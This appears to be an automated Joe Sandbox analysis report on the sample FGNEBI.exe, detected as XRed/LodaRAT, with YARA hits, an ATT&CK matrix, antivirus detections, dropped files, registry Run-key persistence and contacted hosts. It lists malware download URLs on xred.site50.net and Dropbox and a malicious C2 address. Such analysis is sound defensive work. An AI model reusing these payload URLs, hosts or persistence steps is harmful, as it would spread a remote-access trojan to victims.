Source: DELPQB.exe, 0000001E.00000002.2440012891.000000000028E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: DELPQB.exe, 00000010.00000002.1570878643.0000000004B64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81
Source: DELPQB.exe	Binary or memory string: WIN_XP
Source: DELPQB.exe, 0000001B.00000002.1861493214.000000000482F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81>
Source: DELPQB.exe, 00000019.00000003.1728678565.0000000004D0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81D~
Source: DELPQB.exe, 0000001E.00000003.2418800661.00000000046AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81h
Source: DELPQB.exe	Binary or memory string: WIN_XPe
Source: DELPQB.exe, 0000001A.00000002.1816621155.00000000041AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_812
Source: DELPQB.exe	Binary or memory string: WIN_VISTA
Source: DELPQB.exe	Binary or memory string: WIN_7
Source: DELPQB.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR

Remote Access Functionality

Yara detected LodaRAT

Source: Yara match

File source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR

Yara detected XRed

Source: Yara match	File source: FGNEBI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FGNEBI.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00DE91DC
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00DE96E2
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	10_2_002391DC
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	10_2_002396E2

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	421 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	421 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	1 Extra Window Memory Injection	21 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	2 Valid Accounts	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	21 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	38 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	161 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	12 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FGNEBI.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
FGNEBI.exe	87%	Virustotal		Browse
FGNEBI.exe	100%	Avira	TR/Dldr.Agent.SH
FGNEBI.exe	100%	Avira	W2000M/Dldr.Agent.17651006
FGNEBI.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\WLJOQW.vbs	100%	Avira	VBS/Runner.VPJI
C:\ProgramData\Synaptics\RCX5CF5.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX5CF5.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX5CF5.tmp	100%	Joe Sandbox ML
C:\Users\user\Desktop\._cache_FGNEBI.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\~$cache1	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCX5CF5.tmp	100%	ReversingLabs	Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	47%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_FGNEBI.exe	47%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Documents\~$cache1	100%	ReversingLabs	Win32.Worm.Zorex

Source	Detection	Scanner	Label
http://xred.site50.net/syn/Synaptics.rarh	100%	Avira URL Cloud	malware
https://docs.goopF	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dlD	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	172.217.16.206	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.usercontent.google.com	142.250.185.193	true	false	high
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/p/cspreport	Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.goopF	Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	~$cache1.3.dr	false		high
https://drive.usercontent.google.com/%	Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/n	Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ip-score.com/checkip/Brave-Browser	._cache_FGNEBI.exe, 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.15.dr	false		high
http://xred.site50.net/syn/Synaptics.rar	~$cache1.3.dr	false		high
http://xred.site50.net/syn/Synaptics.rarh	FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/	Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX	FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dlD	FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	~$cache1.3.dr	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	~$cache1.3.dr	false		high
https://docs.google.com/X	Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D	Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini	~$cache1.3.dr	false		high
https://docs.google.com/Q	Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x	FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787	Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll	~$cache1.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.16.206	docs.google.com	United States	15169	GOOGLEUS	false
172.111.138.100	unknown	United States	3223	VOXILITYGB	true
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582341
Start date and time:	2024-12-30 11:33:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FGNEBI.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@24/29@4/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 89 Number of non-executed functions: 281
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 184.28.90.27, 51.132.193.105, 20.42.65.92, 20.190.159.64, 4.175.87.197, 23.206.229.226, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedscolprduks05.uksouth.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
Execution Graph export aborted for target Synaptics.exe, PID 8036 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:34:28	API Interceptor	34x Sleep call for process: Synaptics.exe modified
05:34:37	API Interceptor	3x Sleep call for process: WerFault.exe modified
11:34:24	Task Scheduler	Run new task: WLJOQW.exe path: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
11:34:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
11:34:33	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:34:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WLJOQW "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
11:34:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.111.138.100	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Machine-PO.exe	Get hash	malicious	XRed	Browse
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse
	mmi8nLybam.exe	Get hash	malicious	LodaRAT	Browse
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse
69.42.215.252	docx.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	hoaiuy.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	222.msi	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Machine-PO.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	docx.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	hoaiuy.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	222.msi	Get hash	malicious	XRed	Browse	13.107.246.45
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.45
	Machine-PO.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	universityform.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.45
	universityform.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	13.107.246.45
	installer64v9.5.7.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
freedns.afraid.org	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Machine-PO.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	Machine-PO.exe	Get hash	malicious	XRed	Browse	172.111.138.100
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	mmi8nLybam.exe	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	104.250.189.221
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
AWKNET-LLCUS	docx.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	hoaiuy.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	222.msi	Get hash	malicious	XRed	Browse	69.42.215.252
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Machine-PO.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	docx.msi	Get hash	malicious	XRed	Browse	142.250.185.193 172.217.16.206
	hoaiuy.msi	Get hash	malicious	XRed	Browse	142.250.185.193 172.217.16.206
	222.msi	Get hash	malicious	XRed	Browse	142.250.185.193 172.217.16.206
	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206
	JPS.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206
	KOGJZW.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206
	Machine-PO.exe	Get hash	malicious	XRed	Browse	142.250.185.193 172.217.16.206
	AYRASY.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206
	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.185.193 172.217.16.206

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\ProgramData\Synaptics\RCX5CF5.tmp	LWQDFZ.exe	Get hash	malicious	LodaRAT, XRed	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3289285f9ad88d50b4ec103b7b95cad4d32d02d_455b7b6e_70295550-d48a-43c5-8063-7de24d3860e0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1338114451698205
Encrypted:	false
SSDEEP:	192:M52VpsooImp0X8dv1DzJDzqjLOA/FczxwzuiFaZ24IO8EKDzy:NyPAX8dv1JqjkKzuiFaY4IO8zy
MD5:	D0C9EA6C3FC94EF0C6B09CAEEC2A7D88
SHA1:	0237F09E0AC50FAC0CBE0E59CEE8FC04A5ACEFD4
SHA-256:	F5970F240FCCE3B161BAE1F4061DEC7CF9A04A10AB92175062817053CA10E014
SHA-512:	172FEA65F3603BF4115CEBBC7D2E5E1CCD08C963CE7FB4D51B1C0C63CE2952739B67225520887E1A0F085F04AF535CB4D49437AF32699E5734E83640B3628499
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.7.4.8.1.8.8.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.4.7.9.0.4.4.3.9.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.9.5.5.5.0.-.d.4.8.a.-.4.3.c.5.-.8.0.6.3.-.7.d.e.2.4.d.3.8.6.0.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.a.c.b.a.f.7.-.b.a.5.4.-.4.3.b.f.-.9.e.8.4.-.c.1.8.8.f.d.a.2.5.3.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.4.-.0.0.0.1.-.0.0.1.4.-.d.5.8.5.-.5.3.6.2.a.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.